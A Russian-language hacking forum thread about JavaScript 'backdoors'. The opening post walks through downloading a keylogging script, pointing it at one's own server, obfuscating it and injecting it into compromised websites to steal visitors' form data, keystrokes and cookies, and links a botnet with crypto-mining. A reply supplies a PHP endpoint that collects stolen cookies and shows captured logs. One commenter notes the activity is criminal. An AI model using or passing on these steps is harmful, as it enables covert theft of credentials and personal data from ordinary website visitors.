Toggle sidebar

  • 🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»

    🛡 Научитесь находить и использовать уязвимости веб-приложений.
    🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
    🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
    🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.

    Доступ открыт прямо сейчас Записаться бесплатно

Javascript backdoor или как сайты следят за пользователями.

DefWolf

DefWolf

Green Team
24.10.2017
299
787
spies.jpg


482 сайта из топа Alex перехватывают, каждое нажатие клавиш, собирают информация о вашем браузере, ширине экрана, раскладки клавиатуры. Чтобы собирать о вас данные они используют javascript код. .По умолчанию скрипты этих компаний записывают все данные, которые пользователи вводят в различные формы, включая ФИО, email-адреса, телефонные номера, номера социального страхования, даты рождения. Более того, реальное число таких сайтов должно намного превышать изученные несколько сотен, так как ресурсы за пределами топ-50000 специалисты вообще не рассматривали.

Но на самом деле можно намного больше. Допустим на скомпрометированным сайте расположены форма регистрации, где просят указать, mail или телефон, само собой логин и пароль ну и допустим номер банковской карты. Так один разработчик вставил бэкдор в 20 000 сайтов. По данным полиции, с помощью своих бэкдоров разработчик похищал чужие пароли и юзернеймы, а затем использовал их, чтобы получить доступ к чужим аккаунтам в социальных сетях и почтовым ящикам. После злоумышленник убеждал друзей и близких своей жертвы перевести ему деньги. Также хакер регистрировал аккаунты на игорных сайтах, используя личные данные жертв, и совершал покупки в интернет-магазинах за чужой счет. Сообщается, что жертвами злоумышленника стали не только частные лица, но и ряд компаний.

Злоумышленник вставляет вредоносный javascript код, который собирает информацию из всех этих форм, записывает каждое нажатие клавиши и передает на удаленный сервер. Полученную информацию он может продать на каком-нибудь форуме. Такие данные стоят намного больше, чем допустим размещение рекламы на взломанном сайте. А если еще и улучшить бэкдор, то можно незаметно заражать каждую машину пользователя, собирать его cookie. Можно получить доступ к аккаунтам соц. сетям или дать ему zip-bomb. Zip-бомба, также известная как Архив Смерти или англ. decompression bomb— архивный файл, который по своей природе обладает разрушающим действием. При распаковке может вызвать крах системы. А теперь перейдем к практики.

Качаем отсюда бэкдор:
Ссылка скрыта от гостей
. Далее везде, где есть http:// дописываем адрес сервера куда передаваться данные. Обфусифицируем код и вставляем на страницу сайта. Проверить работу бэкдора можно самому перейдя на вредоносную страницу. Если все пройдет удачно, то на ваш сервер передастся информацию о вас.

Есть еще один бэкдор, т.е бот. Ссылка: https://github.com/4k-developer/4K-Botnet . Он более функционален и имеет возможность вставлять заголовки, майнить криптовалюту, убивать браузер и еще кучу интересностей.

Для борьбы со слежкой на сайтах есть плагин: ghostery .
 
  • Нравится
Реакции: AtlantWS, 111, Catharsis и ещё 13
DefWolf сказал(а):
Посмотреть вложение 15560

482 сайта из топа Alex перехватывают, каждое нажатие клавиш, собирают информация о вашем браузере, ширине экрана, раскладки клавиатуры. Чтобы собирать о вас данные они используют javascript код. .По умолчанию скрипты этих компаний записывают все данные, которые пользователи вводят в различные формы, включая ФИО, email-адреса, телефонные номера, номера социального страхования, даты рождения. Более того, реальное число таких сайтов должно намного превышать изученные несколько сотен, так как ресурсы за пределами топ-50000 специалисты вообще не рассматривали.

Но на самом деле можно намного больше. Допустим на скомпрометированным сайте расположены форма регистрации, где просят указать, mail или телефон, само собой логин и пароль ну и допустим номер банковской карты. Так один разработчик вставил бэкдор в 20 000 сайтов. По данным полиции, с помощью своих бэкдоров разработчик похищал чужие пароли и юзернеймы, а затем использовал их, чтобы получить доступ к чужим аккаунтам в социальных сетях и почтовым ящикам. После злоумышленник убеждал друзей и близких своей жертвы перевести ему деньги. Также хакер регистрировал аккаунты на игорных сайтах, используя личные данные жертв, и совершал покупки в интернет-магазинах за чужой счет. Сообщается, что жертвами злоумышленника стали не только частные лица, но и ряд компаний.

Злоумышленник вставляет вредоносный javascript код, который собирает информацию из всех этих форм, записывает каждое нажатие клавиши и передает на удаленный сервер. Полученную информацию он может продать на каком-нибудь форуме. Такие данные стоят намного больше, чем допустим размещение рекламы на взломанном сайте. А если еще и улучшить бэкдор, то можно незаметно заражать каждую машину пользователя, собирать его cookie. Можно получить доступ к аккаунтам соц. сетям или дать ему zip-bomb. Zip-бомба, также известная как Архив Смерти или англ. decompression bomb— архивный файл, который по своей природе обладает разрушающим действием. При распаковке может вызвать крах системы. А теперь перейдем к практики.

Качаем отсюда бэкдор:
Ссылка скрыта от гостей
. Далее везде, где есть http:// дописываем адрес сервера куда передаваться данные. Обфусифицируем код и вставляем на страницу сайта. Проверить работу бэкдора можно самому перейдя на вредоносную страницу. Если все пройдет удачно, то на ваш сервер передастся информацию о вас.

Есть еще один бэкдор, т.е бот. Ссылка: https://github.com/4k-developer/4K-Botnet . Он более функционален и имеет возможность вставлять заголовки, майнить криптовалюту, убивать браузер и еще кучу интересностей.

Для борьбы со слежкой на сайтах есть плагин: ghostery .
Нажмите, чтобы раскрыть...
Довольно интересно
 
  • Нравится
Реакции: DefWolf
У кого-то получилось запустить первую утилиту? Какие логи приходят?
 
DefWolf сказал(а):
Обфусифицируем код и вставляем на страницу сайта
Нажмите, чтобы раскрыть...
можно поподробней на какой сайт(свой?) и чем и как обфусцировать?

---- Добавлено позже ----

DefWolf сказал(а):
адрес сервера куда передаваться данные
Нажмите, чтобы раскрыть...
что поднять надо на сервере?
 
Последнее редактирование модератором:
Max2 сказал(а):
можно поподробней на какой сайт(свой?) и чем и как обфусцировать?
Нажмите, чтобы раскрыть...
Допустим вот:
Ссылка скрыта от гостей
. Бэкдор вставляешь на зараженный сайт, а файл который будет принимать запросы на свой сервер или на другой зараженный сайт:
PHP: 
<?php
$cook = $_GET['cookie'];
if(isset($cook)){
file_put_contents('1.txt', $cook, FILE_APPEND);
}
?>
 
Последнее редактирование:
  • Нравится
Реакции: Max2
DefWolf сказал(а):
Допустим вот:
Ссылка скрыта от гостей
. Бэкдор вставляешь на зараженный сайт, а файл который будет принимать запросы на свой сервер или на другой зараженный сайт:
PHP: 
<?php
$cook = $_GET['cookie'];
if(isset(cook)){
file_put_contents('1.txt', $cook, FILE_APPEND);
}
?>
Нажмите, чтобы раскрыть...
спасибо
 
Max2 сказал(а):
какие логи приходят?
Нажмите, чтобы раскрыть...
Он записывает в файл 1.txt Информацию

---- Добавлено позже ----

Info: ({"as":"AS14061 DigitalOcean, LLC","city":"Toronto","country":"Canada","countryCode":"CA","isp":"Digital Ocean","lat":43.6555,"lon":-79.3626,"org":"Digital Ocean","query":"138.197.174.154","region":"ON","regionName":"Ontario","status":"success","timezone":"America/Toronto","zip":"M5A"});Win32Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36ruInfo: ({"as":"AS14061 DigitalOcean, LLC","city":"Toronto","country":"Canada","countryCode":"CA","isp":"Digital Ocean","lat":43.6555,"lon":-79.3626,"org":"Digital Ocean","query":"138.197.174.154","region":"ON","regionName":"Ontario","status":"success","timezone":"America/Toronto","zip":"M5A"});1

---- Добавлено позже ----

1 это клавиша которую я нажал
 
Последнее редактирование:
  • Нравится
Реакции: Max2
DefWolf сказал(а):
Он записывает в файл 1.txt Информацию

---- Добавлено позже ----

Info: ({"as":"AS14061 DigitalOcean, LLC","city":"Toronto","country":"Canada","countryCode":"CA","isp":"Digital Ocean","lat":43.6555,"lon":-79.3626,"org":"Digital Ocean","query":"138.197.174.154","region":"ON","regionName":"Ontario","status":"success","timezone":"America/Toronto","zip":"M5A"});Win32Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36ruInfo: ({"as":"AS14061 DigitalOcean, LLC","city":"Toronto","country":"Canada","countryCode":"CA","isp":"Digital Ocean","lat":43.6555,"lon":-79.3626,"org":"Digital Ocean","query":"138.197.174.154","region":"ON","regionName":"Ontario","status":"success","timezone":"America/Toronto","zip":"M5A"});1

---- Добавлено позже ----

1 это клавиша которую я нажал
Нажмите, чтобы раскрыть...
всё понятно СУПЕР
 
  • Нравится
Реакции: DefWolf
У Ondrik8 есть тема, где он использует Javascript + ActiveXObject("Shell.Application"), для загрузки бэкдора. Не забывай, что это уголовно наказуемо
 
Последнее редактирование:
  • Нравится
Реакции: erlan1749
Что-то я не могу понять, как с помощью js с фронта можно запускать zip бомбу, например?! Это ж надо выйти из песочницы браузера.
 
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

Похожие темы

Сергей Попов
  • Статья Статья
Статья Предотвращение межсайтового скриптинга (XSS): Полное руководство для защиты вашего сайта
Ответы
0
Просмотры
1 тыс.
Статьи и новости кибербезопасности
Сергей Попов
Сергей Попов
TTpoKypaTop
Статья Азбука хакера: ключевые термины и сокращения в кибербезопасности
Ответы
6
Просмотры
3 тыс.
Курсы, гайды и сертификации
Archivist
Archivist
apache2
Статья Всё о Пентесте и Red Team для новичков в новых реалиях
Ответы
1
Просмотры
3 тыс.
Курсы, гайды и сертификации
z3r0c10wn
z3r0c10wn
Marylin
  • Статья Статья
Статья ASM. Программирование ОС [2] – ядро Kernel
Ответы
0
Просмотры
2 тыс.
Статьи и новости кибербезопасности
Marylin
Marylin

Курс AD

Верх Низ